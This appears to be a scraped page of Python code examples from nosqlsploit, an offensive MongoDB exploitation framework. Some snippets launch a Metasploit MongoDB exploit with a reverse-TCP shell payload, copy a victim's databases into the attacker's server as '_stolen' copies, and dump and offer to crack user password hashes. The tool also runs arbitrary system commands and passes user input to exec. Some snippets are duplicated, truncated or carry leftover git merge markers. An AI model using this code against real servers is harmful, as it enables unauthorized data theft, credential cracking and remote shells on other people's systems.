コード例 #1
0
 def setParam(self ,param ,value):
     '''set plugin par value'''
     param = param.upper()
     pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
     code  = 'global %s\n'%param
     code += '%s="%s"'%(param ,value)
     exec(code)
コード例 #2
0
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def exploit(self):
     '''start exploit !!'''
     try:
         global exploitModule 
         exploitModule = exploitModule()
     except:
         pass
     pp.prettyPrint("[*] Start exploit.." ,YELLOW)
     plugin.exploit()
コード例 #3
0
 def exploit(self):
     '''start exploit !!'''
     try:
         global exploitModule 
         exploitModule = exploitModule()
     except:
         pass
     pp.prettyPrint("[*] Start exploit.." ,YELLOW)
     plugin.exploit()
コード例 #4
0
 def do_set(self,arg):
     args = arg.split(" ")
     if(len(args) == 2):
         param = args[0]
         value = args[1]
         if len(param) and len(value):
             res = self.pluginModule.checkParam(param)
             if res:
                 self.pluginModule.setParam(param ,value)
             else:
                 pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)
     else:
         pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)
コード例 #5
0
 def msfLaunch(self, RHOST, LHOST, LPORT):
     try:
         proc = subprocess.call(
             "msfcli exploit/linux/misc/mongod_native_helper RHOST=" +
             str(RHOST) +
             " DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" +
             str(LHOST) + " LPORT=" + str(LPORT) + " E",
             shell=True)
     except:
         pp.prettyPrint(
             "Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined.",
             RED)
         return
コード例 #6
0
 def enumGrid (self,mongoConn):
     try:
         for dbItem in mongoConn.database_names():
             try:
                 db = mongoConn[dbItem]
                 fs = gridfs.GridFS(db)
                 files = fs.list()
                 pp.prettyPrint("GridFS enabled on database " + str(dbItem),GREEN)
                 pp.prettyPrint(" list of files:",GREEN)
                 pp.prettyPrint("\n".join(files),PURPLE)
             except:
                 pp.prettyPrint("GridFS not enabled on " + str(dbItem) + ".",RED)
     except:
         pp.prettyPrint("[!]Error:  Couldn't enumerate GridFS.  The provided credentials may not have rights.",RED)
     return
コード例 #7
0
 def getPlatInfo(self, mongoConn):
     pp.prettyPrint("Mongodb Server Basic Info", GREEN)
     pp.prettyPrint(
         "MongoDB Version: " + mongoConn.server_info()['version'], PURPLE)
     pp.prettyPrint(
         "Debugs enabled : " + str(mongoConn.server_info()['debug']),
         PURPLE)
     pp.prettyPrint(
         "Platform: " + str(mongoConn.server_info()['bits']) + " bit",
         PURPLE)
     return
コード例 #8
0
 def enumGrid(self, mongoConn):
     try:
         for dbItem in mongoConn.database_names():
             try:
                 db = mongoConn[dbItem]
                 fs = gridfs.GridFS(db)
                 files = fs.list()
                 pp.prettyPrint("GridFS enabled on database " + str(dbItem),
                                GREEN)
                 pp.prettyPrint(" list of files:", GREEN)
                 pp.prettyPrint("\n".join(files), PURPLE)
             except:
                 pp.prettyPrint(
                     "GridFS not enabled on " + str(dbItem) + ".", RED)
     except:
         pp.prettyPrint(
             "[!]Error:  Couldn't enumerate GridFS.  The provided credentials may not have rights.",
             RED)
     return
コード例 #9
0
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def setParam(self ,param ,value):
     '''set plugin par value'''
     param = param.upper()
     if param == 'PAYLOAD':
         if value.upper() == "FALSE":
             code  = 'global PAYLOAD;PAYLOAD="false";'
             exec(code)
             pp.prettyPrint("[*] Disabled PAYLOAD !" ,YELLOW)
         elif self.checkPayload(value) == 'TRUE' and self.getOption("PAYLOAD") != "FALSE":
             pp.prettyPrint("[*] SET PAYLOAD=>%s"%value ,YELLOW)
             code  = 'global PAYLOAD\n'
             code += 'PAYLOAD="%s"'%value
             exec(code)
         else:
             pp.prettyPrint("[!] SET PAYLOAD FALSE !" ,RED)
     else:
         pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
         code  = 'global %s\n'%param
         code += '%s="%s"'%(param ,value)
         exec(code)
コード例 #10
0
 def errmsg(self,msg):
     '''show error msg'''
     pp.prettyPrint("[!] Err:%s"%msg,RED)
コード例 #11
0
 def mainExit(self):
     '''exit NSS'''
     pp.prettyPrint("\nBye ",RED)
     exit(0)
コード例 #12
0
 def printLogo(self):
     '''print NSS logo..'''
     pp.prettyPrint(self.logo,GREY,0)
コード例 #13
0
 def exeCMD(self,cmd):
     '''run system command'''
     pp.prettyPrint('[*] EXEC:%s'%cmd,RED)
     system(cmd)
コード例 #14
0
 def stealDBs(self,LHOST,LPORT,RHOST,mongoConn):
     victim = RHOST
     localDbIp = LHOST
     localDbPort = int(LPORT)
     dbList = mongoConn.database_names()
     menuItem = 1
     if len(dbList) == 0:
         pp.prettyPrint("Can't get a list of databases to steal.  The provided credentials may not have rights.",YELLOW)
         return
     
     for dbName in dbList:
         pp.prettyPrint(str(menuItem) + "-" + dbName,GREEN)
         menuItem += 1
     
     try:
         dbLoot = raw_input("Select a database to steal:")
     except:
         pp.prettyPrint("[!]Invalid selection.",RED)
         stealDBs(myDB,mongoConn)
         
     try:
         #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
         dbNeedCreds = raw_input("Does this database require credentials (y/n)? ")
         if dbNeedCreds.lower() == "n":
             myDBConn = pymongo.MongoClient(localDbIp,localDbPort)
             myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)	
         elif dbNeedCreds.lower() == "y":
             dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",victim,dbUser,dbPass)
         else:
             pp.prettyPrint("[!]Invalid Selection.  Press enter to continue.",RED)
             stealDBs(myDB,mongoConn)
             
         cloneAnother = raw_input("Database cloned.  Copy another (y/n)? ")
         if cloneAnother.lower() == "y":
             self.stealDBs(myDB,mongoConn)
         else:
             return
     except:
         if str(sys.exc_info()).find('text search not enabled') != -1:
             pp.prettyPrint("Database copied, but text indexing was not enabled on the target.  Indexes not moved.",GREEN)
             return
         else:	
             pp.prettyPrint("[!]Something went wrong.  Are you sure your MongoDB is running and options are set?",RED)
             return
コード例 #15
0
ファイル: tools.py プロジェクト: daige/nosqlsploit
    def mainHelp(self):
        '''show help'''
        pp.prettyPrint('NSS HELP MENU',YELLOW)
        pp.prettyPrint('=============',GREY)
        pp.prettyPrint('        COMMAND         DESCRIPTION',YELLOW)
        pp.prettyPrint('        -------         -----------',GREY,0)
        pp.prettyPrint('''
        help            Displays the help menu
        exit            Exit the NSS
        cls             Clear the screen
        show            List the plugins
        search          Search plugins
        use             Use the plugin''',CYAN)
        pp.prettyPrint('NSS HELP::SHOW',YELLOW)
        pp.prettyPrint('==============',GREY)
        pp.prettyPrint('        COMMAND         DESCRIPTION',YELLOW)
        pp.prettyPrint('        -------         -----------',GREY,0)
        pp.prettyPrint('''
        mongodb         List the mongodb plugins
<<<<<<< HEAD
=======
        multi           List the mongodb plugins
>>>>>>> 6f81fb7bb1cc81ab5062065b198e4e0b4b97e162
        all             List all the plugins''',CYAN)
コード例 #16
0
 def showOptions(self):
     '''display plugin options'''
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint("    PLUGIN OPTS" ,YELLOW)
     pp.prettyPrint("    ===========" ,GREY)
     pp.prettyPrint("        %-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
     pp.prettyPrint("        %-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
     for opt in plugin.opts:
         param = opt[0]
         value = opt[1]
         desc = opt[2]
         pp.prettyPrint("        %-15s"%param ,CYAN ,0)
         pp.prettyPrint("%-20s"%value, PURPLE, 0)
         pp.prettyPrint("%-20s"%desc , GREEN)
     pp.prettyPrint("\n",GREY)
コード例 #17
0
 def showUsage(tips):
     pp.prettyPrint('[?] USAGE:%s'%tips,YELLOW)
コード例 #18
0
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def showOptions(self):
     '''display plugin options'''
     pp.prettyPrint("PLUGIN OPTS" ,YELLOW)
     pp.prettyPrint("===========" ,GREY)
     pp.prettyPrint("%-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
     pp.prettyPrint("%-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
     for opt in plugin.opts:
         param = opt[0]
         value = opt[1]
         desc = opt[2]
         pp.prettyPrint("%-15s"%param ,CYAN ,0)
         exec('pp.prettyPrint("%-20s"%' + "%s"%param + ', PURPLE, 0)')
         pp.prettyPrint("%-40s"%desc ,GREEN)
     if self.checkPayload(PAYLOAD) == "TRUE":
         pp.prettyPrint("PAYLOAD OPTS" ,YELLOW)
         pp.prettyPrint("============" ,GREY)
         pp.prettyPrint("%-15s %-40s"%("PARAMETER" ,"DESCRIPTION") ,YELLOW)
         pp.prettyPrint("%-15s %-40s"%("-"*15 ,"-"*40) ,GREY)
         code = open("plugins/payload/" + PAYLOAD + ".py").read()
         exec(code)
         try:
             exec("global NSSPayload")
         except:
             pass
         for opt in NSSPayload.opts:
             param = opt[0]
             desc = opt[1]
             pp.prettyPrint("%-15s"%param ,CYAN ,0)
             pp.prettyPrint("%-40s"%desc ,PURPLE)
コード例 #19
0
    def enumDbs(self, mongoConn):
        try:
            pp.prettyPrint("List of databases:", GREEN)
            pp.prettyPrint("\n".join(mongoConn.database_names()), PURPLE)
        except:
            pp.prettyPrint(
                "[!]Error:  Couldn't list databases.  The provided credentials may not have rights.",
                RED)

        pp.prettyPrint("List of collections:", GREEN)
        try:
            for dbItem in mongoConn.database_names():
                db = mongoConn[dbItem]
                pp.prettyPrint(dbItem + ":", CYAN)
                pp.prettyPrint("\n".join(db.collection_names()), PURPLE)
                if 'system.users' in db.collection_names():
                    users = list(db.system.users.find())
                    pp.prettyPrint("Database Users and Password Hashes:",
                                   GREEN)
                    for x in range(0, len(users)):
                        pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'], GREEN)
                        pp.prettyPrint("\n", GREEN)
                        crack = raw_input("Crack this hash (y/n)? ")
                        if crack.lower() == "y":
                            self.passCrack(users[x]['user'], users[x]['pwd'])
        except:
            pp.prettyPrint(
                "[!]Error:  Couldn't list collections.  The provided credentials may not have rights.",
                RED)
            return
コード例 #20
0
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def info(self):
     '''display plugin infos'''
     pp.prettyPrint("PLUGIN INFOS" ,YELLOW)
     pp.prettyPrint("============" ,GREY)
     pp.prettyPrint("PARAMETER       VALUE" ,YELLOW)
     pp.prettyPrint("-"*15 + " " + "-"*20 ,GREY)
     for info in plugin.infos:
         param = info[0]
         value = info[1]
         pp.prettyPrint("%-15s"%param ,CYAN ,0)
         pp.prettyPrint("%-s"%value ,PURPLE)
コード例 #21
0
ファイル: pluginModule.py プロジェクト: daige/nosqlsploit
 def pluginHelp(self):
     '''plugin help menu'''
     pp.prettyPrint('PLUGIN HELP MENU' ,YELLOW)
     pp.prettyPrint('================' ,GREY)
     pp.prettyPrint('        Command         Description' ,YELLOW)
     pp.prettyPrint('        -------         -----------' ,GREY ,0)
     pp.prettyPrint('''
     help            Displays the plugin menu
     exit            Back to NSS Main
     cls             Clear the screen
     info            Displays the plugin info
     show            Displays the plugin options
     set             Configure the plugin parameters
     exploit         Start plugin to exploit''' ,CYAN)
     pp.prettyPrint('PLUGIN SET HELP' ,YELLOW)
     pp.prettyPrint('===============' ,GREY)
     pp.prettyPrint('        Command         Description' ,YELLOW)
     pp.prettyPrint('        -------         -----------' ,GREY,0)
     pp.prettyPrint('''
     PAYLOAD         Set payload
     <PARAMETER>     Set parameter''' ,CYAN)
コード例 #22
0
ファイル: loadModule.py プロジェクト: daige/nosqlsploit
 def loadError(self,flag):
     if flag:
         pp.prettyPrint("[!] NO THIS PLUGIN !",RED)
     else:
         pp.prettyPrint("[!] IT'S A PAYLOAD !",RED)
コード例 #23
0
 def start(self):
     pp.prettyPrint("[*] Start NSS ..",GREEN)
コード例 #24
0
    def stealDBs(self, LHOST, LPORT, RHOST, mongoConn):
        victim = RHOST
        localDbIp = LHOST
        localDbPort = int(LPORT)
        dbList = mongoConn.database_names()
        menuItem = 1
        if len(dbList) == 0:
            pp.prettyPrint(
                "Can't get a list of databases to steal.  The provided credentials may not have rights.",
                YELLOW)
            return

        for dbName in dbList:
            pp.prettyPrint(str(menuItem) + "-" + dbName, GREEN)
            menuItem += 1

        try:
            dbLoot = raw_input("Select a database to steal:")
        except:
            pp.prettyPrint("[!]Invalid selection.", RED)
            stealDBs(myDB, mongoConn)

        try:
            #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
            dbNeedCreds = raw_input(
                "Does this database require credentials (y/n)? ")
            if dbNeedCreds.lower() == "n":
                myDBConn = pymongo.MongoClient(localDbIp, localDbPort)
                myDBConn.copy_database(dbList[int(dbLoot) - 1],
                                       dbList[int(dbLoot) - 1] + "_stolen",
                                       victim)
            elif dbNeedCreds.lower() == "y":
                dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",
                                       victim, dbUser, dbPass)
            else:
                pp.prettyPrint(
                    "[!]Invalid Selection.  Press enter to continue.", RED)
                stealDBs(myDB, mongoConn)

            cloneAnother = raw_input("Database cloned.  Copy another (y/n)? ")
            if cloneAnother.lower() == "y":
                self.stealDBs(myDB, mongoConn)
            else:
                return
        except:
            if str(sys.exc_info()).find('text search not enabled') != -1:
                pp.prettyPrint(
                    "Database copied, but text indexing was not enabled on the target.  Indexes not moved.",
                    GREEN)
                return
            else:
                pp.prettyPrint(
                    "[!]Something went wrong.  Are you sure your MongoDB is running and options are set?",
                    RED)
                return
コード例 #25
0
 def mainHelp(self):
     '''show help'''
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint('    NSS HELP MENU',YELLOW)
     pp.prettyPrint('    =============',GREY)
     pp.prettyPrint('        COMMAND         DESCRIPTION',YELLOW)
     pp.prettyPrint('        -------         -----------',GREY,0)
     pp.prettyPrint('''
     help            Displays the help menu
     show            List the plugins
     search          Search plugins
     use             Use the plugin
     banner          Show the banner
     cls             Clear the screen
     exit            Exit the NSS''',CYAN)
     pp.prettyPrint("\n",GREY)
コード例 #26
0
    def enumDbs (self,mongoConn):
        try:
            pp.prettyPrint("List of databases:",GREEN)
            pp.prettyPrint("\n".join(mongoConn.database_names()),PURPLE)
        except:
            pp.prettyPrint("[!]Error:  Couldn't list databases.  The provided credentials may not have rights.",RED)

        pp.prettyPrint("List of collections:",GREEN)
        try:
            for dbItem in mongoConn.database_names():
                db = mongoConn[dbItem]
                pp.prettyPrint(dbItem + ":",CYAN)
                pp.prettyPrint("\n".join(db.collection_names()),PURPLE)
                if 'system.users' in db.collection_names():
                    users = list(db.system.users.find())
                    pp.prettyPrint("Database Users and Password Hashes:",GREEN)
                    for x in range (0,len(users)):
                        pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'],GREEN)
                        pp.prettyPrint("\n",GREEN)
                        crack = raw_input("Crack this hash (y/n)? ")
                        if crack.lower() == "y":
                            self.passCrack(users[x]['user'],users[x]['pwd'])
        except:
            pp.prettyPrint("[!]Error:  Couldn't list collections.  The provided credentials may not have rights.",RED)
            return
コード例 #27
0
 def loadError(self):
     pp.prettyPrint("[!] NO THIS PLUGIN !",RED)
コード例 #28
0
 def msfLaunch(self,RHOST,LHOST,LPORT):			
     try:
         proc = subprocess.call("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(RHOST) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(LHOST) + " LPORT="+ str(LPORT) + " E", shell=True)
     except:
         pp.prettyPrint("Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined.",RED)
         return
コード例 #29
0
 def pluginHelp(self):
     '''plugin help menu'''
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint('   PLUGIN HELP MENU' ,YELLOW)
     pp.prettyPrint('   ================' ,GREY)
     pp.prettyPrint('        Command         Description' ,YELLOW)
     pp.prettyPrint('        -------         -----------' ,GREY ,0)
     pp.prettyPrint('''
     help            Displays the plugin menu
     info            Displays the plugin info
     show            Displays the plugin options
     set             Configure the plugin parameters
     exploit         Exploit the target
     cls             Clear the screen
     back            Back to NSS Main''' ,CYAN)
     pp.prettyPrint('    PLUGIN SET HELP' ,YELLOW)
     pp.prettyPrint('    ===============' ,GREY)
     pp.prettyPrint('        Command         Description' ,YELLOW)
     pp.prettyPrint('        -------         -----------' ,GREY,0)
     pp.prettyPrint('''
     <PARAMETER>     Set parameter''' ,CYAN)
     pp.prettyPrint("\n",GREY)
コード例 #30
0
 def getPlatInfo(self,mongoConn):
     pp.prettyPrint("Mongodb Server Basic Info",GREEN)
     pp.prettyPrint("MongoDB Version: " + mongoConn.server_info()['version'],PURPLE)
     pp.prettyPrint("Debugs enabled : " + str(mongoConn.server_info()['debug']),PURPLE)
     pp.prettyPrint("Platform: " + str(mongoConn.server_info()['bits']) + " bit",PURPLE)
     return
コード例 #31
0
            if len(param) and len(value):
                res = self.pluginModule.checkParam(param)
                if res:
                    self.pluginModule.setParam(param ,value)
                else:
                    pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)
        else:
            pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)

    def complete_set(self,text,line,begidx,endidx):
        USE_ARG = self.pluginModule.getOptions()
        if not text:
            completions = USE_ARG[:]
        else:
            completions = [i for i in USE_ARG if i.startswith(text.upper())]
        return completions

    def do_EOF(self):
        return True

    do_back = do_exit

if __name__ == '__main__':
    try:
        loads = loadPlugin(arg)
        loads.cmdloop()
    except KeyboardInterrupt:
        pp.prettyPrint("\n[!] CTRL+C EXIT !",RED)
    except Exception,e:
        pp.prettyPrint("[!] ERR:%s"%e,RED)
コード例 #32
0
 def info(self):
     '''display plugin infos'''
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint("    PLUGIN INFOS" ,YELLOW)
     pp.prettyPrint("    ============" ,GREY)
     pp.prettyPrint("        PARAMETER       VALUE" ,YELLOW)
     pp.prettyPrint("        "+"-"*15 + " " + "-"*20 ,GREY)
     for info in plugin.infos:
         param = info[0]
         value = info[1]
         pp.prettyPrint("        %-15s"%param ,CYAN ,0)
         pp.prettyPrint("%-s"%value ,PURPLE)
     pp.prettyPrint("\n",GREY)